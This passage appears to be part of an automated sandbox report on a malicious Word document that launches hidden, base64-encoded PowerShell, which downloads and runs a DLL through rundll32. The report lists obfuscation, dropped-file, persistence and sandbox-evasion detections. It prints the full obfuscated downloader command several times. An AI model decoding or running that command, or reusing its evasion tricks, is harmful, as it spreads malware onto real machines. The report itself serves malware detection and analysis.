yAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100099ED LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_100099ED
PE file contains an invalid checksum
Source: Chpieog.dll.5.dr Static PE information: real checksum: 0x3f69f should be: 0x438a6
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100038B6 push ecx; ret 7_2_100038C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004D55 push ecx; ret 7_2_10004D68

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EA461 FindFirstFileW, 8_2_002EA461
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
